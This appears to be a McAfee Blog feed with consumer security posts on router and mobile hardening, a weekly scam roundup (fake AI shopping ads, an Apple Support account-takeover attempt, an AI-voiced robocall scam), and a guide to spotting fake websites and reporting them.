    Your router serves as the gateway between your home devices and the internet, making it a critical security component. Start by changing your router’s default administrator username and password immediately after setup. These factory defaults are widely known and easily exploited by attackers. Choose a strong, unique password that combines letters, numbers, and symbols to prevent unauthorized access to your router’s settings.

    Encrypt your Wi-Fi

    Enable WPA3 encryption on your wireless network, as it provides the strongest protection for your Wi-Fi connections. If your router doesn’t support WPA3, use WPA2 as a minimum standard. These protocols scramble your data as it travels between devices and your router, making it unreadable to anyone attempting to intercept your communications.

    Fortify network names and passwords

    Create a unique network name or service set identifier (SSID) that doesn’t reveal your router manufacturer or model number, and pair it with a complex Wi-Fi password at least 12 characters long with a mix of uppercase and lowercase letters, numbers, and special characters. Avoid using personal information such as your address or name in either your network name or password, as this information can help attackers guess your password.

    Update firmware

    Regularly update your router’s firmware to patch security vulnerabilities and improve performance. Check your router manufacturer’s website quarterly for updates if automatic updates aren’t available, as outdated firmware often contains known security flaws that cybercriminals actively exploit.

    Set up guest networks

    Separate the guest network for visitors and smart home devices to protect your primary network where you store sensitive data. If a guest’s device is compromised or if a smart device has security vulnerabilities, the threat can’t easily spread to your main computers and phones. Configure your guest network with a strong password and consider time limits for access.

    Isolate devices and segment the network

    Enable access point isolation, also called client isolation, on your wireless network to prevent potentially compromised devices from attacking other devices on the same network. If you are an advanced user, consider creating separate virtual networks (VLANs) for different device types, such as keeping work computers on a different network segment than entertainment devices.

    Activate the firewall

    Modern routers include built-in firewalls that monitor suspicious activity in both incoming and outgoing network traffic, blocking potentially harmful connections and unnecessary ports and services.

    Install an antivirus

    Antivirus programs are engineered to prevent, detect, and remove viruses and other types of malicious software. Antivirus software can run automatic scans on specific files or directories to make sure no malicious activity is present, and no network or data breach has occurred.

    McAfee’s antivirus software features key security capabilities, including malware detection, quarantine, and removal, as well as options for scanning files and applications, and an advanced firewall for home network security.

    Use multi-factor authentication when possible

    Multi-factor authentication is an authentication method that requires at least two pieces of evidence before granting access to a website. Using this method adds another layer of security to your applications and reduces the likelihood of a data breach.

    Choose a safe web browser

    Web browsers vary widely in terms of the security features, with some offering just the basics and others providing a more complete range of features. Ideally, you should opt for a browser that offers the following security features:

    • Private session browsing
    • Pop-up blocking
    • Privacy features
    • Anti-phishing filter
    • Automatic blocking of reported malicious sites
    • Cross-site script filtering

    When properly implemented, these steps help ensure that your internet connection remains private, your data stays secure, and unauthorized users can’t access your network resources. Regular maintenance of these security settings, combined with staying informed about emerging threats, provides a solid foundation for safe and confident internet use.

    Internet mobile security

    These days, smartphones and tablets hold more personal information than ever before—from banking details and photos to work emails and location data. While this convenience makes life easier, it also creates new opportunities for cybercriminals to target your mobile devices. As you secure your network and desktop or laptop devices, so should you treat your mobile devices with the same care. Here are some straightforward security practices that you can implement to reduce your exposure to mobile threats significantly:

    • Keep your operating system and apps updated: Software updates often include critical security patches that fix vulnerabilities criminals could exploit. Enable automatic updates for your device’s operating system and apps if possible, or check regularly for available updates in your device settings.
    • Download apps only from official stores: Stick to official app stores, such as Google Play Store or Apple App Store, which employ security measures to screen for malicious apps. Before downloading, read app reviews, check the developer’s reputation, and review what permissions the app requests.
    • Manage app permissions carefully: Regularly review and adjust app permissions in your device settings, limiting access to sensitive data like your camera, microphone, contacts, and location, unless absolutely necessary for the app’s core functionality.
    • Stay alert to SMS and messaging scams: Text message scams are increasingly becoming sophisticated, often impersonating legitimate companies or services. Never click links in unexpected text messages, and verify requests for personal information by contacting the company directly through official channels.
    • Use secure mobile browsers and settings: Configure your mobile browser with privacy and security settings that protect your data. Enable features such as pop-up blocking, disable location sharing unless needed, and consider using private browsing modes.
    • Activate device locks and biometric security: Use screen locks with PINs, passwords, patterns, or biometric authentication such as fingerprints or face recognition. Set your device to lock automatically after a short period of inactivity, and avoid using easily guessable codes, such as “1234” or your birthday.
    • Encrypt devices and backups: Turn on your device’s built-in encryption and create secure, encrypted backups of your important data to protect your information even if your smartphone is lost or stolen.
    • Set up remote lock and wipe capabilities: Enable remote tracking, lock, and wipe features on your devices. Services like Find My iPhone or Google’s Find My Device allow you to locate, lock, or remotely erase your entire device if it’s lost or stolen.
    • Exercise caution on public Wi-Fi networks: Avoid accessing sensitive accounts or conducting financial transactions on public networks, and consider using your phone’s mobile hotspot feature instead when you need internet access.

    FAQs about internet security

    Here are answers to the most frequently asked questions about online protection.

    What does internet security cover?

    Internet security protects you from a wide range of online threats, including viruses, malware, phishing attacks, identity theft, and data breaches. It also covers your devices, personal information, online accounts, and network connections to help you browse, shop, and communicate safely online.

    How is internet security different from antivirus software?

    While antivirus software focuses specifically on detecting and removing malicious programs, internet security provides comprehensive protection that includes antivirus software plus additional features such as firewalls, web protection, email security, identity monitoring, and safe browsing tools.

    Do Macs and smartphones need internet security protection?

    Yes, all devices that connect to the internet can be targeted by cybercriminals. Mobile devices and Macs face increasing security threats, including malicious apps, phishing attempts, and network attacks, making protection essential regardless of your device type.

    How can I stay safe on public Wi-Fi?

    Avoid accessing sensitive accounts or making purchases on public Wi-Fi networks. When using public Wi-Fi, stick to encrypted websites with “https” in the URL, avoid automatic connections, and consider using a VPN for added protection.

    How can you keep children safe online?

    As children grow older, their internet use becomes more extensive. To keep them safe online, educate them about the risks of web browsing and best practices to avoid online threats, such as not sharing passwords. Explain which information should be shared and which should be kept private. Instruct them to never click on links from unknown sources. Set up parental controls on certain websites to filter out inappropriate content and maintain a child-friendly interface.

    What are the signs that my account has been compromised?

    Watch for unexpected password reset emails, unfamiliar login notifications, unusual account activity, friends receiving spam from your accounts, or unauthorized charges on your financial statements. If you notice any of these signs, change your passwords immediately and contact the relevant service providers.

    How often should I update my software and devices?

    Enable automatic updates whenever possible and install security patches as soon as they become available. Regular updates address security vulnerabilities that criminals actively exploit, making staying current one of your best defenses against cyber threats.

    Final thoughts

    As more cyber threats emerge and expand in both scope and sophistication, it’s essential that you protect your online activities. Adequate protection doesn’t have to be complicated. Taking steps to install antivirus software, create strong and unique passwords, enable your firewall, and use multi-factor authentication will help build a strong defense against online threats.

    Start implementing these internet security measures today and enjoy the peace of mind that comes with knowing you’re protected online.

    For added security, consider using an all-in-one antivirus solution, such as McAfee, to safeguard your devices from online threats. Let McAfee handle your security, so you can focus on enjoying the internet.

    The post What Is Internet Security? appeared first on McAfee Blog.

    This Week in Scams: Phony AI Ads, Apple Account Takeover Attempts, and a PlayStation Scam

    By: McAfee

    For this week in scams, we have fake AI-generated shopping images that could spoil your holidays, scammers use an Apple Support ticket in a takeover attempt, and a PlayStation scam partly powered by AI.

    Let’s start with those fake ads, because holiday shopping is in full swing.

    Keep a sharp eye out for fake AI shopping ads that sell knockoff goods

    Turns out that three-quarters of people (74%) can’t correctly identify a fake AI-generated social media ad featuring popular holiday gifts—which could leave them open to online shopping scams.

    That finding, and several others, comes by way of research from Santander, a financial services company in the UK.

    Here’s a quick rundown of what else they found:

    • Less than one in 10 (8%) people feel “very confident” in their ability to spot an AI-generated ad on social media.
    • More than half (56%) fear that they or a family member could get scammed as a result.
    • About two-thirds (63%) said that they won’t purchase anything from social media platforms because they’re not sure what’s real and what’s fake.

    From the study … could you tell these ads are both fake?

     

     

    Fake ads, like this, have been popping up across social.
    Fake ads, like this, have been popping up across social.

     

     

    Could you tell this ad is fake?
    Could you tell this ad is fake?

    In all, cheap and readily available AI tools make spinning up fake ads quick and easy work. The same goes for launching websites where those “goods” can get sold. In the past, we’ve seen scammers take two different approaches when they use social media ads and websites to lure in their victims:

    Phishing sites

    During the holidays, scammers pump out ads that offer seemingly outstanding deals on hot items. Of course, the offer and the site where it’s “sold” is fake. Victims hand over their personal info and credit card number, never to see the items they thought they’d purchased. On top of the money a victim loses, the scammer also has their card info and can run up its tab or sell it to others on the dark web.

    Knock-off sites

    In this case, the scammer indeed sells and delivers something. But you don’t get what you paid for. The item looks, feels, fits, or works entirely differently than what was advertised. In this way, people wind up with a cheaply made item cobbled together with inferior materials. Worse yet, these scams potentially prop up sweatshops, child labor, and other illegal operations in the process. Nothing about these sites and the things they sell on them are genuine.

    So, fake AI shopping ads are out there. What should you look out for? Here’s a quick list:

    • First off, any offer that sounds too good to be true and heavy discounts on hard-to-find or popular items are major signs of a scam—and have been for years running now.
    • See if the image looks a little too polished or even cartoony in some cases. As for people in AI ads, they can look airbrushed and have skin tones that seemingly give off an odd glow.
    • Look up reviews of the company. Trustpilot and the Better Business Bureau offer great resources for that. Even simple a search using “CompanyName scam” can give you an idea if it’s a scam or not.
    • And lastly, the combination of our Scam Detector and Web Protection can help sniff out a scam for you.

    The Apple Support scam that came from … Apple? (Not really. We’ll explain.)

    “I almost lost everything—my photos, my email, my entire digital life.”

    So opens a recent Medium post from Eric Moret recounting how he almost handed over his Apple Account to a scammer armed with a real Apple Support ticket to make this elaborate phishing attack look legit.

    Over the course of nearly 30 minutes, a scammer calmly and professionally walked Moret through a phony account takeover attempt.

    It started with two-factor authentication notifications that claimed someone was trying to access his iCloud account. Three minutes later, he got a call from an Atlanta-based number. The caller said they were with Apple Support. “Your account is under attack. We’re opening a ticket to help you. Someone will contact you shortly.”

    Seconds later came another call from the same number, which is where the scam fully kicked in. The person also said they were from Apple Support and that they’d opened a case on Moret’s behalf. Sure enough, when directed, Moret opened his email and saw a legitimate case number from a legitimate Apple address.

    The caller then told him to reset his password, which he did. Moret received a text with a link to a site where he could, apparently, close his case.

    Note that at no time did the scammers ask him for his two-factor authentication code throughout this process, which is always the sign of a scam. However, the scammers had another way to get it.

    The link took him to a site called “appeal-apple dot com,” which was in fact a scam site. However, the page looked official to him, and he entered a six-digit code “confirmation code” sent by text to finish the process.

    That “confirmation code” was actually a fresh two-factor authentication code. With that finally in hand, the scammers signed in. Moret received a notice that a new device had logged into his account. Moret quickly reset his password again, which kicked them out and stopped the attack.

    So, what went wrong here? Let’s break down three key moments in this account takeover scam:

    • The unsolicited phone calls. That’s an immediate sign to hang up and call an official support number to confirm the “issue” yourself.
    • The fake website. A site with a URL like “appeal-apple dot com” is a scam site, even if it looks “official.” Scammers can create them easily today.
    • The code heist. Scammers trick people into handing over their authorization code by calling it something else, like a “confirmation code.”

    So, how can you protect yourself from account takeover scams? Let’s break that down too.

    • Know that Apple Support won’t call you or open a case on your behalf.
    • Also know that anyone can create an Apple Support ticket for anyone else, without verification. If you didn’t create it yourself, it’s a strong sign of a scam.
    • If you have concerns, call Apple yourself at 1-800-275-2273 or contact them through their Apple Support App, available here on Apple’s support page.
    • Only interact with Apple through sites and emails with the proper “apple dot com” address. Watch out for altered addresses like the “appeal-apple dot com” used here.
    • Never, ever share your authentication code in any way … verbally, in an email, in a text, or a website. Any request for it from anyone is a scam.
    • You can see the devices signed into your account any time. Go to Settings, tap your Name, and scroll to see all devices linked to your Apple ID.
    • Get protection that blocks links to scam sites, like our Scam Detectorand Web Protection.

    The FCC takes aim at the Wal-Mart PlayStation 5 Robocall Scam

    Maybe you didn’t get a scam call from “Emma” or “Carl” at Wal-Mart, but plenty of people did. Around eight million in all. Now the Federal Communications Commission’s (FCC) Enforcement Bureau wants to put a stop to them.

    “Emma” and “Carl” are in fact a couple of AI voices fronting a scam framed around the bogus purchase of a PlayStation. It’s garnered its share of complaints, so much that the FCC has stepped in. It alleges that SK Teleco, a voice service provider, provisioned at least some of these calls, and that it must immediately stop.

    According to the FCC, the call plays out like this:

    “A preauthorized purchase of PlayStation 5 special edition with Pulse 3D headset is being ordered from your Walmart account for an amount of 919 dollars 45 cents. To cancel your order or to connect with one of our customer support representatives, please press ‘1.’ Thank you.”

    Pressing “1” connects you to a live operator who asks for personal identifiable such as Social Security numbers to cancel the “purchase.”

    If you were wondering, it’s unlawful to place calls to cellphones containing artificial or prerecorded voice messages absent an emergency purpose or prior express consent. According to the FCC’s press release, SK Teleco didn’t respond to a request to investigate the calls. The FCC further alleges that it’s unlikely the company has any such consent.

    Per the FCC, “If SK Teleco fails to take swift action to prevent scam calls, the FCC will require all other providers to no longer accept call traffic from SK Teleco.”

    We’ll see how this plays out, yet it’s a good reminder to report scam calls. When it comes to any kind of scam, law enforcement and federal agencies act on complaints.

    Get a scam call? Who’s here you can report it to:

    And we close things out a quick roundup …

    Here’s a quick list of a few stories that caught our eye this week:

    Scammers pose as law enforcement, threaten jail time if you don’t pay (with audio)

    Deepfake of North Carolina lawmaker used in award-winning Brazilian Whirlpool video

    What happens when you kick millions of teens off social media? Australia’s about to find out

    We’ll see you next Friday with more updates, scam news, and ways you can stay safer out there.

    The post This Week in Scams: Phony AI Ads, Apple Account Takeover Attempts, and a PlayStation Scam appeared first on McAfee Blog.

    Ways to Tell if a Website Is Fake

    By: McAfee

    Unfortunately, scammers today are coming at us from all angles, trying to trick us into giving up our hard-earned money. We all need to be vigilant in protecting ourselves online. If you aren’t paying attention, even if you know what to look for, they can still catch you off guard. There are numerous ways to detect fake sites, phishing, and other scams, including emails.

    Before we delve into the signs of fake websites, we will first take a closer look at the common types of scams that use websites, what happens when you accidentally access a fake website, and what you can do in case you unknowingly purchased items from it.

    What are fake or scam websites?

    Fake or scam websites are fraudulent sites that look legitimate while secretly attempting to steal your personal information, money, or account access.

    These deceptive platforms masquerade as trustworthy businesses or organizations, sending urgent messages that appear to be from popular shopping websites offering fantastic limited-time deals, banking websites requesting immediate account verification, government portals claiming you owe taxes or are eligible for refunds, and shipping companies asking for delivery fees.

    The urgency aims to trick you into logging in and sharing sensitive information, such as credit card numbers, Social Security details, login credentials, and personal data. Once you submit your data, the scammers will steal your identity, drain your accounts, or sell your details to other criminals on the dark web.

    These scam websites have become increasingly prevalent because they’re relatively inexpensive to create and can reach millions of potential victims quickly through email and text campaigns, social media ads, and search engine manipulation.

    Cybersecurity researchers and consumer protection agencies discover these fraudulent sites through various methods, including monitoring suspicious domain registrations, analyzing reported phishing attempts, and tracking unusual web traffic patterns. According to the FBI’s Internet Crime Complaint Center, losses from cyber-enabled fraud totaled $13.7 billion, with fake websites accounting for a significant portion of these losses.

    Consequences of visiting a fake website

    Visiting a fake website, accidentally or intentionally, can expose you to several serious security risks that can impact your digital life and financial well-being:

    • Credential theft: Scammers can capture your login information through fake login pages that look identical to legitimate sites. Once they have your username and password, they can access your real accounts and steal personal information or money.
    • Credit card fraud: When you enter your bank or credit card details on fraudulent shopping or fake service portals, scammers can use your payment information for unauthorized purchases or sell these to other criminals on the dark web.
    • Malware infection: Malicious downloads, infected ads, or drive-by downloads may happen automatically when you visit certain fake sites. These, in turn, can steal personal files, monitor your activity, or give criminals remote access to your device.
    • Identity theft: Fake sites can collect personal information, such as Social Security numbers, addresses, or birthdates, through fraudulent forms or surveys.
    • Account takeovers: Criminals can use stolen credentials to access your email, banking, or social media accounts, potentially locking you out and using your accounts for further scams.

    Common types of scam websites

    Scammers employ various tactics to create fake websites that appear authentic, but most of these techniques follow familiar patterns. Knowing the main types of scam sites helps you recognize danger faster. This section lists the most common categories of scam websites, explains how they operate, and identifies the red flags that alert you before they can steal your information or money.

    • Fake shopping stores: These fraudulent e-commerce sites steal your money and personal information without delivering products. They offer unrealistic discounts (70%+ off), have no customer service contact information, or accept payments only through wire transfers or gift cards. These sites often use stolen product images and fake customer reviews to appear legitimate.
    • Phishing login pages: These sites mimic legitimate services such as banks, email providers, or social media platforms to harvest your credentials. Their URLs that don’t match the official domain, such as “bankofamerica-security.com” instead of “bankofamerica.com.” Their urgent messages claim your account will be suspended unless you log in immediately.
    • Tech support scam sites: These fake websites claim to detect computer problems and offer remote assistance for a fee. They begin with a pop-up ad with a loud alarm to warn you about viruses, providing phone numbers to call “immediately” or requesting remote desktop access from unsolicited contacts.
    • Investment and crypto sites: These sites guarantee incredible returns on cryptocurrency or investment opportunities, feature fake celebrity endorsements, or pressure you to invest quickly before a “limited-time opportunity” expires.
    • Giveaway and lottery pages: You receive notifications with a link to a page that claims you’ve won prizes In contests you never entered, but require upfront fees or personal information to receive them. They will request bank account details to “process your winnings” or upfront processing fees.
    • Shipping and parcel update portals: These typically appear as tracking pages that mimic delivery services, such as USPS, UPS, or FedEx, to steal personal information or payment details. The pages ask for immediate payment to release and deliver the packages, or for login credentials to accounts you don’t have with that carrier.
    • Malware download pages: These ill-intentioned sites offer “free” but uncertified software, games, or media files that contain harmful code to infect your device once you click on the prominent “Download” button.
    • Advance fee and loan scams: These sites claim to guarantee approved loans or financial services, regardless of your credit score. But first, you will have to post an upfront payment or processing fees before any actual assistance is rendered.

    Understanding these common scam types helps you recognize fake sites before they can steal your information or money. When in doubt, verify legitimacy by visiting official websites directly through bookmarks or search engines rather than clicking suspicious links.

    For the latest warnings and protection guidance, check resources from the Federal Trade Commission and the FBI’s Internet Crime Complaint Center.

    Recognize a fake site

    You can protect yourself by learning to recognize the warning signs of fake sites. By understanding what these scams look like and how they operate, you’ll be better equipped to shop, bank, and browse online with confidence. Remember, legitimate companies will never pressure you to provide sensitive information through unsolicited emails or urgent pop-up messages.

    1. Mismatched domain name and brand: The website URL doesn’t match the company name they claim to represent, like “amazoon-deals.com” instead of “amazon.com.” Scammers use similar-looking domains to trick you into thinking you’re on a legitimate site.
    2. Spelling mistakes and poor grammar: Legitimate businesses invest in professionally created content to ensure clean and error-free writing or graphics. If you are on a site with multiple typos, awkward phrasing, or grammatical errors, this indicates that it was hastily created and not thoroughly reviewed, unlike authentic websites.
    3. Missing or invalid security certificate: The site lacks the “https://” prefix in the URL or displays security warnings in your browser. Without proper encryption, any information you enter can be intercepted by criminals.
    4. Fantastic deals: Look out for prices that are dramatically low—like designer items at 90% off or electronics at impossibly low costs. Scammers use unrealistic bargains to lure victims into providing payment information.
    5. High-pressure countdown timers: The site displays urgent messages such as “Only 2 left!” or countdown clocks with limited-time offers that reset when you refresh the page. These fake urgency tactics push you to make hasty decisions without proper research.
    6. No physical address, contact information, or legitimate business details: The site provides only an email address or contact form. In the same vein, any email address they provide may look strange, like northbank@hotmail.com. Any legitimate business will not use a public email account, such as Hotmail, Gmail, or Yahoo.
    7. Missing or vague return policy: Legitimate businesses want satisfied customers and provide clear policies for returns and exchanges. Scams, however, often fail to provide clear refund policies, return instructions, or customer service information.
    8. Stolen or low-quality images: Scammers often steal images from legitimate sites without permission, making their product photos look pixelated, watermarked, or inconsistent in style and quality.
    9. Fake or generic reviews: Authentic reviews include specific details and a mix of ratings and comments. On fake websites, however, customer reviews are often overly positive, using generic language, posted on the same dates, or containing similar phrasing patterns.
    10. Limited payment options: Legitimate businesses offer secure payment options with buyer protection. Fake websites, however, only accept wire transfers, cryptocurrency, gift cards, or other non-reversible or untraceable payment methods.
    11. Recently registered domain: The website was created very recently—often just days or weeks ago, whereas established businesses typically have older, stable web presences.
    12. Fake password: If you’re at a fake site and type in a phony password, the fake site is likely to accept it.

    Recognize phishing, SMiShing, and other fake communications

    Most scams typically start with social engineering tactics, such as phishingsmishing, and fake social media messages containing suspicious links, before directing you to a fake website.

    From these communications, the scammers impersonate legitimate organizations before finally executing their malevolent intentions. To avoid being tricked, it is essential to recognize the warning signs wherever you encounter them.

    Email phishing red flags

    Fake emails are among the most common phishing attempts you’ll encounter. If you see any of these signs in an unsolicited email, it is best not to engage:

    • One way to recognize a phishing email is by its opening greeting. A legitimate email from your real bank or business will address you by name rather than a generic greeting like “Valued Customer” or something similar.
    • In the main message, look for urgent language, such as “Act now!” or “Your account will be suspended immediately.” Legitimate organizations rarely create artificial urgency around routine account matters. Also, pay attention to the sender’s email address. Authentic companies use official domains, not generic email services like Gmail or Yahoo for business communications.
    • Be suspicious of emails requesting your credentials, Social Security number, or other sensitive information. Banks and reputable companies will never ask for passwords or personal details via email.
    • Look closely at logos and formatting. Spoofed emails often contain low-resolution images, spelling errors, or slightly altered company logos that don’t match the authentic versions.

    SMS and text message scams

    Smishing messages bear the same signs as phishing emails and have become increasingly sophisticated. These fake messages often appear to come from delivery services, banks, or government agencies. Common tactics include fake package delivery notifications, urgent banking alerts, or messages claiming you’ve won prizes or need to verify account information.

    Legitimate organizations typically don’t include clickable links in unsolicited text messages, especially for account-related actions. When in doubt, don’t click the link—instead, open your banking app directly or visit the official website by typing the URL manually.

    Social media phishing

    Social media platforms give scammers new opportunities to create convincing fake profiles and pages. They might impersonate customer service accounts, create fake giveaways, or send direct messages requesting personal information. These fake sites often use profile pictures and branding that closely resemble legitimate companies.

    Unusual sender behavior is another indicator of a scam across all platforms. This includes messages from contacts you haven’t heard from in years, communications from brands you don’t typically interact with, or requests that seem out of character for the supposed sender.

    Examples of fake or scam websites

    Scammers have become increasingly cunning in creating fake websites that closely mimic legitimate businesses and services. Here are some real-life examples of how cybercriminals use fake websites to victimize consumers:

    USPS-themed scams and websites

    Scammers exploit your trust in the United States Postal Service (USPS), designing sophisticated fake websites to steal your personal information, payment details, or money. They know you’re expecting a package or need to resolve a delivery issue, making you more likely to enter sensitive information without carefully verifying the site’s authenticity.

    USPS-themed smishing attacks arrive as text messages stating your package is delayed, undeliverable, or requires immediate action. Common phrases include “Pay $1.99 to reschedule delivery” or “Your package is held – click here to release.”

    Common URL tricks in USPS scams

    Scammers use various URL manipulation techniques to make their fake sites appear official. Watch for these red flags:

    • Misspelled domains: Sites like “uspps.com,” “uspo.com,” or “us-ps.com” instead of the official “usps.com”
    • Extra characters: URLs containing hyphens, numbers, or additional words like “usps-tracking.com” or “usps2024.com”
    • Different extensions: Domains ending in .net, .org, .info, or country codes instead of .com
    • Subdomain tricks: URLs like “usps.fake-site.com” where “usps” appears as a subdomain rather than the main domain
    • HTTPS absence: Legitimate USPS pages use secure HTTPS connections, while some fake sites may only use HTTP

    Verify through official USPS channels

    Always verify package information and delivery issues through official USPS channels before taking any action on suspicious websites or messages:

    • Official USPS website: Report the incident directly to usps.com by typing the URL into your browser rather than clicking links from emails or texts. Use the tracking tool on the homepage to check your package status with the official tracking number.
    • Official USPS mobile app: The USPS mobile app, available from official app stores, provides secure access to tracking, scheduling, and delivery management. Verify that you are downloading from USPS by checking the publisher name and official branding.
    • USPS Customer Service: If you receive conflicting information or suspect a scam, call USPS Customer Service at 1-800-ASK-USPS (1-800-275-8777) to verify delivery issues or payment requests.
    • Your local post office: When you need definitive verification, speak with postal workers at your local USPS location who can access your package information directly in their systems.

    Where and how to report fake USPS websites

    Reporting fake USPS websites helps protect others from falling victim to these scams and assists law enforcement in tracking down perpetrators.

    • Report to USPS: Forward suspicious emails to the United States Postal Inspection Service and report fake websites through the USPS website’s fraud reporting section. The Postal Inspection Service investigates mail fraud and online scams targeting postal customers.
    • File with the Federal Trade Commission: Report the fraudulent website at ReportFraud.ftc.gov, providing details about the fake site’s URL, any money lost, and screenshots of the fraudulent pages.
    • Contact the Federal Bureau of Investigation: Submit reports through the FBI’s Internet Crime Complaint Center, especially if you provided personal information or lost money to the scam.
    • Alert your state attorney general: Many state attorneys general’s offices track consumer fraud and can investigate scams targeting residents in their jurisdiction.

    Remember that legitimate USPS services are free for standard delivery confirmation and tracking. Any website demanding payment for basic package tracking or delivery should be treated as suspicious and verified through official USPS channels before providing any personal or financial information.

    Tech support pop-up ads scams

    According to the Federal Trade Commission, tech support scams cost Americans nearly $1.5 billion in 2024. These types of social engineering attacks are increasingly becoming sophisticated, making it more important than ever to verify security alerts through official channels.

    Sadly, many scammers are misusing the McAfee name to create fake tech support pop-up scams and trick you into believing your computer is infected or your protection has expired, and hoping you’ll act without thinking.

    These pop-ups typically appear while you’re browsing and claim your computer is severely infected with viruses, malware, or other threats. They use official-looking McAfee logos, colors, and messaging to appear legitimate to get you to call a fake support number, download malicious software, or pay for unnecessary services.

    Red flags of fake McAfee pop-up

    Learning to detect fake sites and pop-ups protects you from scams. Be on the lookout for these warning signs:

    • Offering phone numbers to call immediately: Legitimate McAfee software never displays pop-ups demanding you call a phone number right away for virus removal.
    • Requests for remote access: Authentic McAfee alerts won’t ask you for permission to control your computer to “fix” issues remotely.
    • Immediate payment demands: Real McAfee pop-ups don’t require instant payment to resolve security threats.
    • Countdown timers: Fake alerts often include urgent timers claiming your computer will be “locked” or “damaged” if you don’t act immediately.
    • Poor grammar and spelling: Many fraudulent pop-ups contain obvious spelling and grammatical errors.
    • Browser-based alerts: Genuine McAfee software notifications appear from the actual installed program, not through your web browser.

    Properly close a McAfee-themed pop-up ad

    If you see a suspicious pop-up claiming to be from McAfee, here’s exactly what you should do:

    1. Close the tab immediately: Don’t click anywhere on the pop-up, not even the “X” button, as this might trigger malware downloads.
    2. Use keyboard shortcuts: Press Ctrl+Alt+Delete or Command+Option+Escape (Mac) to force-close your browser safely.
    3. Don’t call any phone numbers: Never call support numbers displayed on the pop-ups, as these connect you directly to scammers.
    4. Avoid downloading software: Don’t download any “cleaning” or “security” tools offered through pop-ups.
    5. Clear your browser cache: After closing the pop-up, clear your browser’s cache and cookies to remove any tracking elements.

    Verify your actual McAfee protection status

    To check if your McAfee protection is genuinely active and up-to-date:

    • Open your installed McAfee software directly: Click on the McAfee icon in your system tray or search for McAfee in your start menu.
    • Visit the official McAfee website: Go directly to mcafee.com by typing it into your address bar.
    • Log in to your McAfee account: Check your subscription status through your official McAfee online account.
    • Use the McAfee mobile app: Download the official McAfee Mobile Security app to monitor your protection remotely.

    Remember, legitimate McAfee software updates and notifications come through the installed program itself, not through random browser pop-ups. Your actual McAfee protection works quietly in the background without bombarding you with alarming messages.

    Crush fake tech support pop-ups

    Stay protected by trusting your installed McAfee software and always verifying security alerts through official McAfee channels, such as your installed McAfee dashboard or the official website.

    1. Close your browser safely. If you see a fake McAfee pop-up claiming your computer is infected, don’t click anything on the pop-up. Instead, close your browser completely using Alt+F4 (Windows) or Command+Q (Mac). If the pop-up does not close, open Task Manager (Ctrl+Shift+Esc) and end the browser process. This prevents any malicious scripts from running and stops the scammers from accessing your system.
    2. Clear browser permissions. Fake security pop-ups often trick you into allowing notifications that can bombard you with more scam alerts. Go to your browser settings and revoke notification permissions for suspicious sites. In Chrome, go to Settings > Privacy and Security > Site Settings > Notifications, then remove any unfamiliar or suspicious websites from the list of allowed sites.
    3. Remove suspicious browser extensions. Malicious extensions can generate fake McAfee alerts and redirect you to scam websites. Check your browser extensions by going to the extensions menu and removing any that you don’t recognize or that you didn’t intentionally install.
    4. Reset your browser settings. If fake pop-ups persist, reset your browser to its default settings to remove unwanted changes made by malicious websites or extensions, while preserving your bookmarks and saved passwords. In most browsers, you can find the reset option under Advanced Settings.
    5. Run a complete security scan. Use your legitimate antivirus software to perform a full system scan. If you don’t have security software, download a reputable program from the official vendor’s website only, such as McAfee Total Protection, to detect and remove any malware that might be generating the fake pop-ups.
    6. Update your operating system and browser. Ensure your device has the latest security and web browser updates installed, which often include patches for vulnerabilities that scammers exploit. Enable automatic updates to stay protected against future threats.
    7. Review and adjust notification settings. Configure your browser to block pop-ups and block sites from sending you notifications. You could be tempted to allow some sites to send you alerts, but we suggest erring on the side of caution and just block all notifications.

    Steps to take if you visited or purchased from a fake site

    Be prepared and know how to respond quickly when something doesn’t feel right. If you suspect you’ve encountered a fake website, trust your instincts and take these protective steps immediately.

    1. Disconnect immediately: Close your browser by using Alt+F4 (Windows), Ctrl + W (Chrome), or Command+Q (Mac) on your keyboard.
    2. Run a comprehensive security scan: If you suspect a virus or malware, disconnect from the internet to prevent data transmission. Conduct a full scan using your antivirus software to detect and remove any potential threats that may have been downloaded.
    3. Contact your credit card issuer: Call the number on the back of your card and report the fraudulent charges for which you can receive zero liability protection. Card companies allow up to 60 days for charge disputes under federal law and can refund payments made to the fake store. Consider requesting a temporary freeze on your account while the investigation proceeds.
    4. Cancel your credit card: Request a replacement card with a new number to give you a fresh start. Your card issuer can expedite the request if needed, often within 24-48 hours.
    5. Document everything thoroughly: Save all emails, receipts, order confirmations, and screenshots of the fake website before it potentially disappears. This documentation will be crucial for your chargeback and insurance claims, and any legal proceedings.
    6. Update passwords on other accounts: Scammers often test stolen credentials across multiple platforms, so if you reused the same password on the fake site that you use elsewhere, change those passwords immediately. Enable two-factor authentication on important accounts like email, banking, and social media.
    7. Stay alert for follow-up scams: Scammers may attempt to contact you via phone, email, or text claiming to “resolve” your situation through fake shipping notifications, additional payments to “release” your package, or “refunds” on your money in exchange for personal information.
    8. Monitor your credit and financial accounts. Keep a close eye on your bank and credit card statements for several months and place a fraud alert on your credit reports through one of the three major credit bureaus—TransUnion, Equifax, and Experian. Consider a credit freeze for maximum protection.
    9. Check for legitimate alternatives. If you were trying to purchase a specific product, research authorized retailers or the manufacturer’s official website. Verify business credentials, secure payment options, and return policies before making new purchases.

    Report a scam website, email, or text message

    • Federal Trade Commission: Report fraudulent websites to the FTC, which investigates consumer complaints and uses this data to identify patterns of fraud and take enforcement action against scammers.
    • FBI’s Internet Crime Complaint Center: Submit detailed reports to the IC3 for suspected internet crimes. IC3 serves as a central hub for reporting cybercrime and coordinates with law enforcement agencies nationwide.
    • State Attorney General: If the fake store claimed to be located in your state, consider reporting to your state attorney general’s office, as these have dedicated fraud reporting systems and can take action against businesses operating within state boundaries. Find your state’s reporting portal through the National Association of Attorneys General website.
    • Domain registrar, hosting provider, social media: Look up the website’s registration details using a WHOIS tool, then report abuse to both the domain registrar and web hosting company. Most providers have dedicated abuse reporting emails and will investigate violations of their terms of service. If the fake page is on social media, you can report it to the platform to protect other consumers.
    • Search engines: Report fraudulent sites to Google through their spam report form and to Microsoft Bing via their webmaster tools to prevent the fake sites from appearing in search results.
    • The impersonated brand: If scammers are impersonating a legitimate company, report directly to that company’s fraud department or customer service. Most brands have dedicated channels for reporting fake websites and will work to shut them down.
    • Share your experience to protect others: Leave reviews on scam-reporting websites such as the Better Business Bureau’s Scam Tracker or post about your experience on social media to warn friends and family. Your experience can help others avoid the same trap and contribute to the broader fight against online fraud.
    • Essential evidence to gather:
      • Full website URL and any redirected addresses
      • Screenshots of the fraudulent pages, including fake logos or branding
      • Transaction details, if you made a purchase (receipts, confirmation emails, payment information)
      • Email communications from the scammers
      • Date and time when you first encountered the site
